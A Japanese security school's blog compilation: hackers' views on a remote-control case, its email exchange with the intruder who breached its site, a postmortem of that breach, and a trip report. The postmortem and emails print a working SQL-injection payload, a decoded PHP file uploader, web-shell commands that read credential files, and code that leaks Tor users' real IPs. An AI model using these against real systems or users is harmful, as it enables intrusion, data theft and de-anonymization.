遠隔操作事件についてのハッカー達の見解まとめ

パソコン遠隔操作事件で、インターネット掲示板に殺害予告を書き込んだとして威力業務妨害容疑で逮捕されたIT関連会社社員の片山祐輔容疑者(30)が逮捕されてからもうすぐ3週間になろうとしている。

逮捕前後は、片山容疑者の情報がメディアにあふれ、「ネコ男」「オタク」「非モテ」などと、興味本位に報じられることが多かった今回の事件。風向きが変わったのは、弁護人として「足利事件」で無罪を勝ち取ったことで知られる佐藤弁護士が登場してからというもの、ネットで「支援」の動きが見えけられ反転攻勢の動きを見せて来た。

メディアの風向きも変わりつつある今、一体どうなっていくのか?目が離せない状況が続いている。その間もメディアは”片山の弁護側は遠隔操作の「C#」というウイルスを片山は作る能力を持っていないと主張している。などと報じたり、起訴前だと言うのに卒業アルバムをさらすなど血も涙もないのか?批判の声にさらされている。
01c786a3

そこで今後の行方が気になる我々は著名ハッカー、IT詳しいや有識者に今後の見通しを聞いて回った。尚、回答なしが70件近くある事を申し添えると共に、質問から12時間しか経過して無い事を考慮し、追加で返答があり次第順次追加していくものとする。

当学院が行なった質問は以下である。

こんにちは。遠隔操作事件で逮捕されている片山被告が冤罪若しくは不起訴処分になった場合、その後の展開はどうなるとお考えでしょうか?by WHZ白Z

では以下見て行こう。

竹渕瑛一氏

片山被告が主張する証拠も情況証拠に過ぎないのでまだわからないです.風向きとして不起訴処分になる公算が強いというのはわかりますが.後に強化されるとすれば,科捜研に情報科学部門が新設されるのではないでしょうか?

高一人参@欠陥遺伝子氏

冤罪になったら警察はやばそうですね

やまざきkei5氏

どうでしょう。仮に冤罪だったら、真犯人は彼の近くにいそう(←根拠なし)ですから、今ごろ職場の人あたりを念入りに調査しているのでは。

connect24h氏

なぜに私へ質問?警察は新たに真犯人を探すだけ、片山容疑者は損害賠償請求するだけでは。ただ、よっぽど決定的な無罪の証拠がなければ、このまま起訴されると思います。例え、裁判で逆転無罪になったとしても、ズルズル数年は裁判が続くでしょう。

Sen UENO氏

表明する見解は特に持ち合わせておりません。

鳥取ループ氏

別の真犯人が捕まるみたいな明確な冤罪ならメディア、警察共に晒し首状態員なるでしょうけど、そうでなければ、ひっそりと終わらせようとするでしょうね。不謹慎ですが、むしろ展開が面白くなる可能性があるのは片山氏が有罪になった場合ではないですか?彼が真犯人だろうとそうでなかろうと、「別の真犯人」が再び声明を出すことは可能ですから。高木先生が有罪と言ったものは無罪だったので、高木先生が冤罪を疑っているということは有罪だな、とおちょくろうかと思いましたがやめましたw

hority>/dev/null氏

こんにちは。冤罪であっても警察は何も学ばないんじゃないかと思ってます、つまり今後も冤罪事件、容疑者の吊し上げはあると思います。ただ、サイバー捜査要員の強化はどんどんしていくんじゃないでしょうか、というかして欲しいですよね。なにも詳しくないし専門家じゃないので適当ですけど。もうちょっと小さな視野での展開ですと、真犯人不明のまま迷宮入りじゃないでしょうか?釈放後になにか声明があるかもですね。

野澤篤史(なぎさ)氏

こんにちは。私見ですが、表面上は何も変わらないと思います。マスコミも今までの事を無かった事にして警察を叩くでしょう。 水面下では、今までの捜査手法についての反省と見直しや強化に税金が注がれるんじゃないですかね。 使い道が正しいかは別問題ですが・・・。

くりす@SECCON-CTF氏

お久しぶりです。私も自分なりに見解を持っていますが、話すととても長くなるのでブログ (https://x86-64.jp/blog ) で公開しようと考えています。こちらの更新が完了しましたら追って連絡します。

white_iceage/ジェブラ氏

これが冤罪、または不起訴処分になると警察はますます思い切った捜査ができなくなると思います。疑わしい人いても迂闊に逮捕に踏み切れないと思います。IT犯罪捜査が遅れていることが更に露呈されるわけですし。  僕はまだ素人なのでこれくらいしか思いつかないですね(^^;;

Dark_quartz氏

まず当然日本警察が批判に晒されるでしょうね。そしてネットも沸く。ネット等に極端に疎い方々は賛否両論orよく分からないままかもしれません。 まぁもしそうなったとして、警察側がどう出るのかが見物ですね。真面目に謝罪して知識人と捜査再開か、シラを切って同じような事を繰り返すのか。あくまで個人的な見解なので、深くは突っ込まないで下さいませ。

祐天寺氏

こんにちは。もし司法機関で有る警察の過ちが認められたら際、これは司法全般に当てはまりますが、単に謝罪だけで終わらせるのではなく目に見える何か罰則の様な物が必要ではないかと考えます。とても困難なハードルですが…

じりず氏

極刑不可避

情報屋Ops_jp(白龍)卍氏

まず、警察の信頼がまた下がるのは確実。 その後どうなるかは”犯人”次第

犯人とのメールやり取り一部始終

憎き犯人との間にどの様なやり取りがあったのかそのメールの全てを公開致します。

※尚、犯人に譲歩したり、仲間になる様に仕向ける様な口調につきまして誤解のない様に申し上げておきますが、犯行声明メールが届いた時点ではまだ、この人物が犯人と確定された訳ではありませんでしたし、Tor経由のメールであった為に警戒されて連絡が取れなくなる事を危惧した為に行なった発言であり、学院としての信条は逮捕であります。既に関係個所への通報・相談は行なっており公開に支障がないと判断致しましたので公開に踏み切りました。

ピンクで囲った発言が犯人で、白が白Zでございます。

大変ご迷惑をおかけしました。
私がやりました。

正直に言って頂ければ大げさな事にはしませんので、
どの様にやったのか正確に提示して下さい。

この度は8946ユーザーの皆様、
そして白Z様に多大なるご迷惑をおかけしまして申し訳ございませんでした
・PostgreSQLに第三者が接続できる
・Clipbucketに脆弱性が残っている
この二つが発端となり、データベース奪取へと繋がりました
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
->ファイルのリストアップ->bbsのconfig.phpからユーザー名・パスワードを取得->スクリプトの自己削除
->PostgreSQLに接続->データーベースのダンプと削除
まずは、不必要なサービス(PostgreSQL)へ外部から接続できないようにしてください
次に、Clipbucketのバージョンアップを
最後に/var/www/hackerschool.jp/以下のファイル・ディレクトリのパーミッションをより限定的なものに変更してください
DB削除前のバックアップがあります、必要であれば添付します
お騒がせしました

確認しました。
データベースのバックアップがあれば、お願いします。
こちらで、リストアします。
あと、利用したスクリプトファイルを参考までにいただけますか?
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
この個所、具体的な手順を教えていただけますか?
今後、この件をふまえ、教訓にさせていただきます。

バックアップを添付しました
現在のDBを再度バックアップした後にお試しください
あと、利用したスクリプトファイルを参考までにいただけますか?
残念ながらバックアップ以外は全て破棄しました
shell_execを利用したPHP Shellです
http://php.net/manual/ja/function.shell-exec.php
Clipbucketの脆弱性->MySQL->cacheディレクトリにスクリプト展開
この個所、具体的な手順を教えていただけますか?
追って連絡します

最新のバックアップあります
このメール届いていますか

はい。届いています。
手順付きで答えていただkないと何も解決致しません。

検証したところSF.netで配布されている最新バージョン、clipbucket-2.6-r738.zipにも脆弱性がありました
修正されていないようです
絶対に使用しないでください!
以上

具体的にはどの部分でしょうか?

スクリプトの展開
view_channel.php?user=-1′ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL INTO DUMPFILE ‘/var/www/’#
ClipBucket 2.6 Revision 738 Multiple SQL Injection Vulnerabilities
http://www.exploit-db.com/exploits/23252/
正誤
○「→修正されていない←」
×「最新版にも脆弱性」

確認しました。
ログをみるかぎり、
files/logs/のフォルダに、tmpuawju.php というファイルをアップしてますよね?
このファイルが何をしたのか知りたいので、
ファイルをいただけますか?
消されたのであれば、再現お願いします。

消されたのであれば、再現お願いします。
PHP Shellです
一行バージョン

リクエスト : http://hoge.com/hoge.php?cmd=uname
レスポンス : Linux
リクエスト : http://hoge.com/hoge.php?cmd=whoami
レスポンス : apache

WhitehackerZ様
連絡先が変わりましたので、変更をお願いします
何かあればこちらまで
hc4czw32@tormail.org

メールアドレス変更の件、了解しました。
あと、やはりログに見当たらないので、Linuxコマンドで具体的にファイルを指
定(特定)して、中身を閲覧した過程と方法を教えてもらますか?

大事にはしない->報奨金とは、酷い話ですね

状況を考えて下さい。
約束は守ります。
しかし、犯人追及を辞めると自作自演を疑われかねない事はご理解頂けませんか?
今回の様な被害受けて警察などに届け出しない会社は普通は決してない事ですから
我々が疑われます。

御返事は頂けないのでしょうか?
明日午前中いっぱいまでに何らかの御返事頂けないようでしたら、
事後処理放棄とみなしそれなりの対処させて頂きます。

できれば月曜日の午前中までにお願いします。
御返事は頂けないのでしょうか?
明日午前中いっぱいまでに何らかの御返事頂けないようでしたら、
事後処理放棄とみなしそれなりの対処させて頂きます。
月曜日の午前中では?
勝手に予定を変えられては困ります
生IPを取得できる(可能性がある)メソッド 5+α
気に入っていただけると信じています
– メソッド1
Adobe Flash Player
Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得できる
http://help.adobe.com/ja_JP/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b8f6c0-7ffe.html
http://forums.adobe.com/message/4262734
http://forums.adobe.com/thread/685245
– メソッド2
Oracle Java
Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得できる
http://www.rgagnon.com/javadetails/java-0085.html
メソッド3
Microsoft Silverlight
SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる
System.Net.Sockets
http://msdn.microsoft.com/en-us/library/system.net.sockets(v=vs.95).aspx
Silverlight 2 and System.Net.Sockets.Socket
http://weblogs.asp.net/mschwarz/archive/2008/03/07/silverlight-2-and-sockets.aspx
– メソッド4
WebSocket
実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる
FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
http://www.html5rocks.com/ja/tutorials/websockets/basics/
http://ja.wikipedia.org/wiki/WebSocket
– メソッド5
SSL
ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる

– メソッド6
TorDNSELを利用してアク禁
悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁
https://www.torproject.org/projects/tordnsel.html.en

有難うございます。
勇み足だった事は認めますが、貴方の直接の連絡先も知りませんし、
7時間も返信(私からのメールを見たのか見てないのか)なければ
放棄したのか?ぐらい考えてしまいます。
逆の立場でそう感じませんかね?

確認しましたが、全部英語でわかりません。各々詳細解説お願いします。

説明は難しいのでしょうか?
何かしらの御返事もらえませんか?

ソースコード貼ります
ブログに掲載するならソースコード付で十分
この件(Tor解析)で補償は終了 メソッド1~5の質問だけ答えます
約束の通り、おおごとにしない(司法機関・IPAなど外部への情報提供をしない)こと
– メソッド1
Adobe Flash Player
Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得できる
ActionScript
var urlRequest:URLRequest = new URLRequest();
urlRequest.url = “http://example.com/log”;
var urlLoader:URLLoader = new URLLoader();
urlLoader.load(urlRequest);
– メソッド2
Oracle Java
Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得できる
Java
URL url = new URL(“http://anonymouse.com/log”);
URLConnection conn = url.openConnection(Proxy.NO_PROXY);
– メソッド3
Microsoft Silverlight
SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる
Silverlight + C#
var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
var socketAsyncEventArgs = new SocketAsyncEventArgs();
socketAsyncEventArgs.RemoteEndPoint = new DnsEndPoint(“anonymouse.com”, 80);
socket.ConnectAsync(socketAsyncEventArgs);
– メソッド4
WebSocket
実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる
JavaScript
socket = new WebSocket(“ws://h0lnugtzsrpbx1wj.anonymouse.com:8800/log”);
socket.send(‘test’);
FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs
– メソッド5
SSL
ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる

– メソッド6
TorDNSELを利用してアク禁
悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁
https://www.torproject.org/projects/tordnsel.html.en

はっ?
貴方にそんな上から目線で発言される覚えはないですし、
貴方からこれにて終了と言われる覚えはないのですが?
ふざけているのですか?
全員にノベルティおくったり(これだけでも数十万)
商談保留にされて、じゃあ警察等に行かない代わりに貴方お金の保障してもらえますか?
優しく寛大にせっしていればつけあがるなら約束保護にさせてもらいます。
貴方はちょこちょこっと数回メールした程度ですまされる範囲だとおもうのですか?

まだ何も終わってないのですが?今後の事は何もまだ話し合いが出来てませんが?これにて終了と貴方がいう問題ではありませんよね?我々にとってメリットがなければ一方的に損害が出てる状況で終焉はありえませんよ?

前回のメールから20時間経過しようとしてますがこのままであれば逃走を図ったとみなし約束破棄します。最終警告です。

犯人のツイッターアカウント
hanninn01

犯人とのツイッター上でのやり取りはこちら

http://togetter.com/li/458743

 

匿名化ソフト(TOR)で攻撃された場合の生IPアドレス取得方法

難攻不落のTorを使用された攻撃を受けた場合大概の人は泣き寝入りの状況ですが、私達whitehackerzは幾つか有効な生IP取得作戦を考えました。

それぞれ一つ一つでは数%の成功率しかないかもしれませんが、全てやる事により数十パーセント程度になるはずです。

また、記載事項には決定打は載せてません。(我々も犯人追及中の身でありますからご容赦願いたいと思います)これらよりも格段に優れた方法もありますからTor=恐怖という図式も近々崩壊する事と思います。

メソッド1   Adobe Flash Player

Flash Playerは串に非対応
「Flashのロード->リクエストを送信」で生IPを取得でき

ActionScript
var urlRequest:URLRequest = new URLRequest();
urlRequest.url = “http://example.com/log“;
var urlLoader:URLLoader = new URLLoader();
urlLoader.load(urlRequest);

http://help.adobe.com/ja_JP/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b8f6c0-7ffe.html
http://forums.adobe.com/message/4262734
http://forums.adobe.com/thread/685245

メソッド2   Oracle Java

Javaはブラウザに設定された串を使用できるが、
串を使用せずにリクエストを送信することもできる
「アプレットのロード->リクエストを送信」で生IPを取得でき

Java
URL url = new URL(“http://anonymouse.com/log“);
URLConnection conn = url.openConnection(Proxy.NO_PROXY);

http://www.rgagnon.com/javadetails/java-0085.html

メソッド3   Microsoft Silverlight

SilverlightのHTTPクライアントはブラウザに設定された串を使用するが、
ソケットクラスを使用すれば串をbypassできる
メソッド1と2のように生IPを取得できる

Silverlight + C#
var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
var socketAsyncEventArgs = new SocketAsyncEventArgs();
socketAsyncEventArgs.RemoteEndPoint = new DnsEndPoint(“anonymouse.com“, 80);
socket.ConnectAsync(socketAsyncEventArgs);

System.Net.Sockets
http://msdn.microsoft.com/en-us/library/system.net.sockets(v=vs.95).aspx
Silverlight 2 and System.Net.Sockets.Socket
http://weblogs.asp.net/mschwarz/archive/2008/03/07/silverlight-2-and-sockets.aspx

メソッド4   WebSocket

実装によってはブラウザの串の設定を無視することもある
串の設定を無視するような実装であれば生IPを取得できる

JavaScript
socket = new WebSocket(“ws://h0lnugtzsrpbx1wj.anonymouse.com:8800/log“);
socket.send(‘test’);

FirefoxのWebSocketでDNS漏れ
https://blog.torproject.org/blog/firefox-security-bug-proxy-bypass-current-tbbs

http://www.html5rocks.com/ja/tutorials/websockets/basics/
http://ja.wikipedia.org/wiki/WebSocket

メソッド5   SSL

ブラウザの設定によっては、SSLを使用した接続のとき串を通さないことがある
サイト全体をSSL接続にすることが不可能な場合は、
0pxの画像をページに入れると生IPを取得できる
<img width=”0″ src=”https://domain/0px.jpg“>

メソッド6   TorDNSELを利用してアク禁

悪意を持つユーザーにTorを悪用させない最も有効な手段
アク禁

https://www.torproject.org/projects/tordnsel.html.en

武雄市樋渡市長突撃奮闘記

2/15(金)の夕方16時より佐賀県武雄市の武雄市役所3階の市長室にてWhitehackerz養成学院は学院の運命を賭けて突撃して参りました。その様子をお伝え致します。

イザ出陣の校長CIMG0004

太宰府インターチェンジより車で約1時間の旅ですCIMG0003

途中腹ごしらえで金立パーキングエリアへCIMG0006

早めに到着したのでホテルのチェックインをすませ武雄市の象徴とも言うべき『武雄温泉楼門』へ。20年ぶりのお色直しということで保存修理工事が始まってました。CIMG0007

そしていよいよ市役所到着!CIMG0008

びっくりしたのは(笑)正面玄関の受付に武雄競輪の出走表が!残念ながら開催中ではなかったので参戦は見送りに!CIMG0009

玄関入口に沢山の行政視察の歓迎札が!盛り上がっているようだ。CIMG0010

話題の3階のFacebook課をパチリ!所内の写真をこれしか撮って無い事にあとから気づいたのですが、とにかく開かれたオープンな役所という雰囲気満載でした!CIMG0011

市長到着を待つ校長CIMG0012

約1時間の商談の末最後にパチリ1246856864872

これからのむぞぉ~!CIMG0015

帰路へ!CIMG0016

まとめてまとめて編集後記

今回の訪問は実に有意義でした。提案させて頂いた内容は例えゆっくりでも動いていければと思いますが、何より話題の武雄市及び武雄市長を様々な事を知ることができました。

  • 非常に開かれた市という印象を受けた
  • Facebook係長の山田氏がイケメンだった
  • 樋渡市長が推定183?ほどありビックリした
  • 飲食店の数は少なかっ
  • たがどの店も活気があった
  • 市長をしたって移住までした屋良氏に出会えた
  • FB良品の会合がたまたま開催されてたが熱気にあふれている感じだった

ちょっと幼稚な書き方ですがそんな感じでした。で、一番書きたい事はここからです。校長がビールを飲んでる写真があると思いますが、そのお店含めて4件梯子しました。その都度色々な方とお話させて頂きました。店員さん、大将、隣のお客さん、ママ、ホステス・・・

それとなく今の武雄市はどうですか?市長有名ですねwwなど質問投げかけたのですが、誰一人としてネガティブな発言をした方はいませんでした。それどころか今後に期待しているとだれしも口にしており、インターネット上での批判が完全に武雄市外で一人走りしている事がわかりました。校長と私は無作為に入店した訳でこれは統計学的にもそこそこ信用に値するデータなのかな?と思います。

※みなさん市長は変りものと発言していた事は正直に書いておきますwwwwwwwwwwww

全員が現状満足しているか?と言えばそうでない方もいましたが、満場一致の意見はこれから武雄は必ず良くなる!と信じていることです。今、日本中でこれから良くなるとハッキリ言える市民を抱えている自治体はどれほどあるでしょうか?そんな市民のやる気や活力を与えているという真実を目の当たりにし本当にビックリしました。

こんな内容を書けば仕事貰う為におべんちゃらを言っていると思われるでしょうが、民意が知りたければ温泉旅行ついでに行けばわかります。私どもとしても勿論仕事になる事は有難い事ですし、そうなってほしいという願望はありますが、この様な場でおべんちゃらを言うほど白Zは落ちぶれていません。

最後に、「第1回全国FB良品担当者連絡会議」の合間にも関わらず、1時間もお時間頂き誠に有難うございました。樋渡市長ならびに担当者様及び同席して頂いた方々に感謝致します。

行けば分かる。

では、いつ?行くのか?
imadesyo01

ハッキング事件2.13のお詫びと解析結果及び解説

この度私どもが運営するハッキング学習サイト8946にて只ならぬご心配とご迷惑をおかけしました事を心よりお詫び申し上げます。また、会員様におかれましては、個人情報が流出するという極めて危険な目にあわせました事お詫びのしようも無いほどに申し訳なく思っております。改めまして本当に申し訳ございませんでした。この被害に遭われた方々に関しましては後日何らかの誠意を持って対応させて頂きますので今しばらくのお時間を頂けますよう重ねてお願い申し上げます。

さて、クラッキング被害から1日が経過しまして被害の全貌が明らかになりましたのでご報告と、また侵入方法と改善済み事項の説明と移らせて頂きます。

1.被害の全貌について

今回の事件は2013年2月13日の未明、午前2時16分に起こりました。後述しますが、その後のログ解析により2月12日の深夜午後11時頃より攻撃が始まったものと考えられます。
その攻撃により、会員様のメールアドレス、ログインID及びログインPasswordが全て抜き取られデータベースを抹消されました。
またその後、攻撃を行なった犯人と思われる人物より会員様宛てにランダムにanti8946@yahoo.comというメールアドレスから、

件名:Your password were leaked from 8946.
本文:Hi, Kiddies!
>
> We sucked fuc**ng database from 8946 and dropped it.
> Here is a present for you.

という情報と抜き取った会員様のメールアドレス一覧が送りつけられました。(一部違う表記の会員様もいらっしゃいます)BC838fOCUAArSdZ
(画像提供Kusano氏)

その後、15時に犯人と思われる人物から『私が犯人です。』との犯行声明が届きました。
xd7awdsl@tormail.orgから送信されておりTor経由である事がわかりました。hannninn0101
しかしながら、安易に断定する訳にもいかず複数回の接触の結果、犯人しか知り得ない情報や断片的ではありましたが、侵入経路の自供内容の整合性など総合的に判断しまして、この人物を犯人と断定するに至りました。

さて、問題の手口ですが、
・8946で利用しているDB(PostgreSQL)に第三者が接続できる
・Clipbucketに脆弱性が残っている(DBはMysql)
この二つが発端となり、データベース奪取へと繋がったようです。

具体的には、

Clipbucketの脆弱性->MySQL->特定のディレクトリにスクリプト展開->ファイルのリストアップ->bbsのconfig.phpからユーザー名・パスワードを取得->スクリプトの自己削除->PostgreSQLに接続->データーベースのダンプと削除という過程を踏んだと結論づけました。

2.侵入方法検証・解析

それでは私共が結論づけた根拠を示す為にも実際に検証して参ります。

まず、ログの解析を行いました。
被害が起きる1日前の、2013年2月12日22:23あたりに怪しいログを発見します。
(抜粋)

87.195.253.3 - - [12/Feb/2013:22:23:11 +0900] "GET /XXXX.php?xxx=-9268%27%20UNION%20ALL%20SELECT%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f746573742f75706c6f61643e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a%2...<省略>...%20INTO%20DUMPFILE%20%27%2Fvar%2Fwww%2Fxxxxx%2Fxxxx.php%27%23

まず、IPアドレス「87.195.253.3」ですが、Torを利用したIP偽造とわかりました。
次に、 HEXコンバートを行いました。

すると、以下のようなPHPプログラムだと判明。

[php]
<?php
if (isset($_REQUEST["upload"])){
$dir=$_REQUEST["uploadDir"];
if (phpversion()<‘4.1.0’){
$file=$HTTP_POST_FILES["file"]["name"];
@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
}else{
$file=$_FILES["file"]["name"];
@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
}
@chmod($dir."/".$file,0755);
echo "File uploaded";
}else{
?>
<form action=".$_SERVER[" enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000" />
<b>sqlmap file uploader</b>
<input type="file" name="file" />
to directory: <input type="text" name="uploadDir" value="/var/www/html-hackerschool/files/temp" />
<input type="submit" name="upload" value="upload" /></form>
<?php } ?>

[/php]

分かりやすいように整形していますが、
ソースをみると、ファイルをアップロードするphpプログラムのようです。

phpのプログラムをHEX変換し、データを取り出しているSQL文にUNION SELECTで結合を行い、ログの最後、INTO DUMPFILE文で、このPHPファイルを特定のフォルダに出力しています。

上記コードを実行して、出力されたphpファイルにアクセスしてみます。

ページの画像

つぎに、ログから、アップロードされたファイルは、phpのプログラムで、passthru($_GET[“cmd”]);という1行のスクリプトだと推測しました。
これは、Unix コマンドか実行できるphpの関数です。

手元で作成して、このスクリプトファイルをアップロードしてみます。
ページの画像2

ファイルが正常にアップロードされました。

次に、そのアップしたファイルにアクセスし、ログに残されているパラメーターを付けて検証していきます。

1.cmd.php?cmd=uname -a
稼働しているwebサーバーの情報を表示するコマンドです。

ページの画像3

2.cmd.php?cmd= find /var/www/hackerschool.jp/hack/ -name *config*
「config」というファイルを検索しています。

ページの画像5

3.cmd.php?cmd= cat /var/www/hackerschool.jp/XXXXXXX/config.php
catコマンドで、中身を表示しています。
ページの画像6

結果、データバースに接続するための情報が表示されました。

そこから、犯人は、その接続情報をつかって、外部からデータベースに接続し、情報を抜き取り、その後、データベースを削除したと思われます。

3.修正内容・復旧作業

まず、PostgreSQLに関して、接続できるIPを固定し、外部から接続できないよう設定変更を行いました。
該当ファイル・フォルダに対してパーミッションをより限定的なものに変更いたしました。

動画サイトに関しては、すべての脆弱性が確認・修正できるまで、一時的に閉鎖いたしました。

掲示板も一時閉鎖いたしました。

次に、バックアップ作業ですが、8946で利用している会員情報や問題情報を格納しているデータベース自体が抹消されていることと、悪意あるすべてのファイルが確認できなかったため、サーバ丸ごと、リストアするという形で対応しました。
6時間前のバックアップデータはあったのですが、すでに攻撃された後のバックアップだったため、念のため、ログを確認し、数日前のバックアップにて、リストア作業を行いました。

また、犯人確保についてですが全力であたると御約束致します。
私達の長年に蓄積されたノウハウと独自のハッカーネットワークを駆使し犯人を追いつめます。
遠隔操作事件でも御承知のように今回の事件もTorを使用しており通常の追跡は困難を極めますが、張り巡らされた網に犯人がかかる時間はそう遠くないと考えています。懸賞金制度(50万円)も設けていますので全力で確保を行ない、様々な調査をへて司法機関への引き渡しを考えております。

4.発見

これらの一連の攻撃を受けた事により、改めて検証していたのですが、SF.netで配布されている最新バージョン、clipbucket-2.6-r738.zipにも脆弱性がある事が判明しました。

修正されていないようですので、絶対に使用しないでください!

以上で、今回の事件につきましてのご報告とさせて頂きます。

この度は誠に申し訳ございませんでした。
今後、この様な事がない様に万全の態勢を組むと共に、セキュリティ界の発展の為、安全なインターネット社会構築の為に必死に頑張って参ります。
すぐに結果が伴う事は出来ないかもしれませんが、新規一転真面目に努力していきますので、何卒温かく見守って頂ければ幸いに存じます。
最後になりますが、私共の緊急時に、平日の御忙しい時間帯であるにも関わらず様々な激励のコメントや調査協力をして頂いた方々に心よりお礼申し上げますと共に、このご恩は必ずお返し致します事をお誓い致します。
有難うございました。

whitehackerz養成学院 校長 田口雅章及び従業員一同

ハッキングされました。

おはずかしながら、当学院運営のハッキング学習サイト8946(http://www.hackerschool.jp/hack/)がハッキング被害に遭いました。
皆様には大変ご迷惑をおかけしまして大変申し訳ありません。

現段階で分かっている事は、2/13午前2時16分に8946のデータベースが全て抜き取られました。尚、その後犯人は anti8946@yahoo.comというメールアドレスから登録会員宛てに、

件名:Your password were leaked from 8946.

本文:Hi, Kiddies!
>
> We sucked fuc**ng database from 8946 and dropped it.
> Here is a present for you.

という内容のメールが送信されております。BC838fOCUAArSdZ
(画像提供kusano氏)

現時点では復旧を急ぐとともに、原因究明に全力を注いでおります。復旧はもう間もなくで完了すると思われますが、会員様のメールアドレス、ID、パスワードが流出した可能性が濃厚であり、被害は甚大であると考えられます。

原因究明と再発防止策の実施及び犯人特定に全力を挙げる所存ですので何卒、何卒我々を見捨てないで下さい。

以下、恥を忍んでログを公開致します。何かお気づきになられましたら、info@whitehackerz.jpまでお知らせ頂けると幸いです。

エラーログ

[Wed Feb 13 01:12:50 2013] [error] [client 119.240.206.111] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/func.php on line 3, referer: http://www.hackerschool.jp/hack/take10.php
[Wed Feb 13 01:12:50 2013] [error] [client 119.240.206.111] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/bord_js.php on line 14, referer: http://www.hackerschool.jp/hack/take10.php
[Wed Feb 13 01:47:48 2013] [error] [client 122.26.113.214] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:47:49 2013] [error] [client 122.26.113.214] PHP Notice: Undefined index: password in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/pocketFunction.php on line 75, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
[Wed Feb 13 01:47:50 2013] [error] [client 122.26.113.214] PHP Warning: Call-time pass-by-reference has been deprecated in /var/www/hackerschool.jp/hack/bbs/webapp/lib/util/Action.php on line 43, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 01:47:50 2013] [error] [client 122.26.113.214] PHP Notice: Undefined index: f in /var/www/hackerschool.jp/hack/bbs/lib/Pocket/class/Image.php on line 80, referer: http://www.hackerschool.jp/hack/bbs/
[Wed Feb 13 01:55:01 2013] [error] [client 121.108.50.78] PHP Warning: Cannot modify header information – headers already sent by (output started at /var/www/hackerschool.jp/hack/data/Smarty/templates_c/%%93^934^9347D887%%header_jis.tpl.php:103) in /var/www/hackerschool.jp/hack/bord/inc/form_js.php on line 23, referer: http://www.hackerschool.jp/hack/take20/index.pl?file=main.txt
